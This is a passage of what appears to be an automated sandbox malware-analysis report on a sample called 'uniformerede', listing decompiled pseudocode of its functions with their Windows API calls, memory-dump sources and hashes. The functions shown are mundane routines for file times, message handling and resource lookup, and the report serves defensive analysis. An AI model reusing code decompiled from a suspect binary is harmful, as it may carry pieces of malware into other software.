                                                                                                                                                                                                                            					_v8 = 0xffffffff;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					FindClose(_t16);
                                                                                                                                                                                                                            					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                                                                                                                                                                                                            						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 004099FB
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?), ref: 00409A06
                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00409A1F
                                                                                                                                                                                                                            • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2659516521-0
                                                                                                                                                                                                                            • Opcode ID: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8260cc7e23bb950901b1fe7feff768f5a598361a0acbd4b33f51618969189df4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E0043F118(void* __eax, intOrPtr* __edx) {
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				void* _t50;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				void* _t65;
                                                                                                                                                                                                                            				intOrPtr* _t66;
                                                                                                                                                                                                                            				intOrPtr* _t68;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                            				_t50 = __eax;
                                                                                                                                                                                                                            				_t17 =  *__edx;
                                                                                                                                                                                                                            				_t69 = _t17 - 0x84;
                                                                                                                                                                                                                            				if(_t69 > 0) {
                                                                                                                                                                                                                            					_t19 = _t17 + 0xffffff00 - 9;
                                                                                                                                                                                                                            					if(_t19 < 0) {
                                                                                                                                                                                                                            						_t21 = E0043B6EC(__eax);
                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                            							L28:
                                                                                                                                                                                                                            							return _t21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L27:
                                                                                                                                                                                                                            						_t23 = E0043C1FC(_t50, _t68); // executed
                                                                                                                                                                                                                            						return _t23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                                                                                                                                                                                            						_t21 = E0043F084(__eax, _t51, __edx);
                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t68 + 0xc)) != 0) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t21 = E00441A08(_t50);
                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t68 + 8)));
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t68 + 4)));
                                                                                                                                                                                                                            						_push( *_t68);
                                                                                                                                                                                                                            						_t32 = E00441704(_t50);
                                                                                                                                                                                                                            						_push(_t32);
                                                                                                                                                                                                                            						L00407540();
                                                                                                                                                                                                                            						return _t32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L27;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t69 == 0) {
                                                                                                                                                                                                                            					_t21 = E0043C1FC(__eax, __edx);
                                                                                                                                                                                                                            					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                                                                                                                                                                                            					E0043AAC0(_t50,  &_v28,  &_v20);
                                                                                                                                                                                                                            					_t21 = E0043EFF0(_t50, 0,  &_v28, _t65, 0);
                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t68 + 0xc)) = 1;
                                                                                                                                                                                                                            					return _t21;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t39 = _t17 - 7;
                                                                                                                                                                                                                            				if(_t39 == 0) {
                                                                                                                                                                                                                            					_t66 = E004519E0(__eax);
                                                                                                                                                                                                                            					if(_t66 == 0) {
                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t21 =  *((intOrPtr*)( *_t66 + 0xe8))();
                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L27;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t21 = _t39 - 1;
                                                                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                                                                            					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                                                                                                                                                                                            						goto L28;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t21 == 0x17) {
                                                                                                                                                                                                                            						_t45 = E00441704(__eax);
                                                                                                                                                                                                                            						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
                                                                                                                                                                                                                            							_t47 =  *0x49bce0; // 0x0
                                                                                                                                                                                                                            							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                                                                                                                                                                                            								_t48 =  *0x49bce0; // 0x0
                                                                                                                                                                                                                            								E0043C130(_t48, 0, 0x1f, 0);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Capture
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1145282425-3916222277
                                                                                                                                                                                                                            • Opcode ID: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction ID: 937a996b5d7fc64cee9df4cbb2c234063ab2d53f9f2184138994f8e7c5ea39be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddce305eaa9cba147f95a957de41488157d3692e2b1deffae6d8d4608c37cf8a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6331A235A04A00C7DA20AA6DC985B1B2284AB4D358F14667FB486C7393CA7ECC0D874D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00446564(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                            				intOrPtr _t8;
                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				intOrPtr _t20;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t25 = __esi;
                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                                                                            				_push(0x4465ea);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				 *0x49eb20 =  *0x49eb20 - 1;
                                                                                                                                                                                                                            				if( *0x49eb20 < 0) {
                                                                                                                                                                                                                            					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                                                                                                                                                                                            					_t31 =  *0x49eb1c;
                                                                                                                                                                                                                            					E00446330(_t16, __edi,  *0x49eb1c);
                                                                                                                                                                                                                            					_t6 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
                                                                                                                                                                                                                            					_t8 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					E0041A548(_t8, _t16, _t17, _t31);
                                                                                                                                                                                                                            					_t21 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					_t10 =  *0x447948; // 0x447994
                                                                                                                                                                                                                            					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
                                                                                                                                                                                                                            					_t22 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					_t12 =  *0x4465f4; // 0x446640
                                                                                                                                                                                                                            					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
                                                                                                                                                                                                                            					_t23 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					_t14 =  *0x44675c; // 0x4467a8
                                                                                                                                                                                                                            					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t20);
                                                                                                                                                                                                                            				 *[fs:eax] = _t20;
                                                                                                                                                                                                                            				_push(0x4465f1);
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                              • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                                                                                                            • String ID: @fD
                                                                                                                                                                                                                            • API String ID: 3775504709-3452771706
                                                                                                                                                                                                                            • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043C1FC(intOrPtr* __eax, signed int* __edx) {
                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                            				short _v14;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                            				intOrPtr* _t47;
                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                            				signed int* _t79;
                                                                                                                                                                                                                            				intOrPtr _t90;
                                                                                                                                                                                                                            				intOrPtr* _t96;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                            				_t96 = __eax;
                                                                                                                                                                                                                            				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_t39 =  *_t79;
                                                                                                                                                                                                                            					if(_t39 < 0x100 || _t39 > 0x108) {
                                                                                                                                                                                                                            						_t40 =  *_t79;
                                                                                                                                                                                                                            						__eflags = _t40 - 0x200;
                                                                                                                                                                                                                            						if(_t40 < 0x200) {
                                                                                                                                                                                                                            							L30:
                                                                                                                                                                                                                            							__eflags = _t40 - 0xb00b;
                                                                                                                                                                                                                            							if(_t40 == 0xb00b) {
                                                                                                                                                                                                                            								E0043AB1C(_t96, _t79[1], _t40, _t79[2]);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                            							return  *((intOrPtr*)( *_t96 - 0x14))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t40 - 0x20a;
                                                                                                                                                                                                                            						if(_t40 > 0x20a) {
                                                                                                                                                                                                                            							goto L30;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *(_t96 + 0x50) & 0x00000080;
                                                                                                                                                                                                                            						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                            							_t46 =  *_t79 - 0x200;
                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                            								L21:
                                                                                                                                                                                                                            								_t47 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            								E0045B21C( *_t47, _t79, _t96, __eflags);
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t50 = _t46 - 1;
                                                                                                                                                                                                                            							__eflags = _t50;
                                                                                                                                                                                                                            							if(_t50 == 0) {
                                                                                                                                                                                                                            								L22:
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                            									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								return E00403DE8(_t96, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t53 = _t50 - 1;
                                                                                                                                                                                                                            							__eflags = _t53;
                                                                                                                                                                                                                            							if(_t53 == 0) {
                                                                                                                                                                                                                            								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t53 == 1;
                                                                                                                                                                                                                            							if(_t53 == 1) {
                                                                                                                                                                                                                            								goto L22;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t55 =  *0x49eb18; // 0x0
                                                                                                                                                                                                                            							__eflags =  *((char*)(_t55 + 0x20));
                                                                                                                                                                                                                            							if( *((char*)(_t55 + 0x20)) == 0) {
                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t56 =  *0x49eb18; // 0x0
                                                                                                                                                                                                                            								__eflags =  *(_t56 + 0x1c);
                                                                                                                                                                                                                            								if( *(_t56 + 0x1c) == 0) {
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t90 =  *0x49eb18; // 0x0
                                                                                                                                                                                                                            								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
                                                                                                                                                                                                                            								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								GetKeyboardState( &_v280);
                                                                                                                                                                                                                            								_v20 =  *_t79;
                                                                                                                                                                                                                            								_v16 = E00451924( &_v280);
                                                                                                                                                                                                                            								_v14 = _t79[1];
                                                                                                                                                                                                                            								_v12 = _t79[2];
                                                                                                                                                                                                                            								return E00403DE8(_t96, __eflags);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t67 = _t40 - 0x203;
                                                                                                                                                                                                                            						__eflags = _t67;
                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							 *_t79 =  *_t79 - 2;
                                                                                                                                                                                                                            							__eflags =  *_t79;
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t68 = _t67 - 3;
                                                                                                                                                                                                                            						__eflags = _t68;
                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags = _t68 != 3;
                                                                                                                                                                                                                            						if(_t68 != 3) {
                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v24 = E004519E0(_t96);
                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                                                                                                                                                                                                                            					if(_t73 == 0) {
                                                                                                                                                                                                                            						goto L32;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v24 = E004519E0(__eax);
                                                                                                                                                                                                                            					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                                                                                                                                                                                                                            						if(_t73 == 0) {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t73;
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            0x0043c30c
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c312
                                                                                                                                                                                                                            0x0043c312
                                                                                                                                                                                                                            0x0043c317
                                                                                                                                                                                                                            0x0043c31b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c31f
                                                                                                                                                                                                                            0x0043c325
                                                                                                                                                                                                                            0x0043c328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c331
                                                                                                                                                                                                                            0x0043c338
                                                                                                                                                                                                                            0x0043c346
                                                                                                                                                                                                                            0x0043c34d
                                                                                                                                                                                                                            0x0043c354
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c360
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c310
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2a6
                                                                                                                                                                                                                            0x0043c2ab
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b7
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2ad
                                                                                                                                                                                                                            0x0043c2b0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b2
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c2b5
                                                                                                                                                                                                                            0x0043c25f
                                                                                                                                                                                                                            0x0043c266
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c275
                                                                                                                                                                                                                            0x0043c27d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c283
                                                                                                                                                                                                                            0x0043c212
                                                                                                                                                                                                                            0x0043c219
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c22e
                                                                                                                                                                                                                            0x0043c23d
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043c242
                                                                                                                                                                                                                            0x0043c220
                                                                                                                                                                                                                            0x0043c38d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0043C331
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: KeyboardState
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1724228437-0
                                                                                                                                                                                                                            • Opcode ID: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction ID: 91b3d7ef9cae681235685cdbb9a2033184f7e3317d8ce185dcb9f17e25b61164
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f2acd7fa3e65c504f9cebf6f4804a4b530c3e7649d8a629da2463b5fec39ead
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1941A131A006158FDB20DBA9C4C86AFB7A1AB0E704F1491A7E801FB3A5C738DD45C79A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 39%
                                                                                                                                                                                                                            			E004747D8(char __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                            				struct HRSRC__* _t13;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t37;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t51);
                                                                                                                                                                                                                            				_push(0x474878);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t51;
                                                                                                                                                                                                                            				_t11 = E00404E80(_v8);
                                                                                                                                                                                                                            				_t12 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            				_t13 = FindResourceA(_t12, _t11, 0xa); // executed
                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                            					E00404A14(_t48, 0x47488c);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t37 =  *0x49e668; // 0x400000
                                                                                                                                                                                                                            					_t33 = E0041E0D0(_t37, 1, 0xa, _v8);
                                                                                                                                                                                                                            					E0040500C(_t48,  *((intOrPtr*)( *_t33))());
                                                                                                                                                                                                                            					_push( *((intOrPtr*)( *_t33))());
                                                                                                                                                                                                                            					_t29 = E00404ED8(_t48);
                                                                                                                                                                                                                            					_pop(_t38);
                                                                                                                                                                                                                            					E0041D8CC(_t33, _t38, _t29);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t41);
                                                                                                                                                                                                                            				 *[fs:eax] = _t41;
                                                                                                                                                                                                                            				_push(0x47487f);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0047480A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
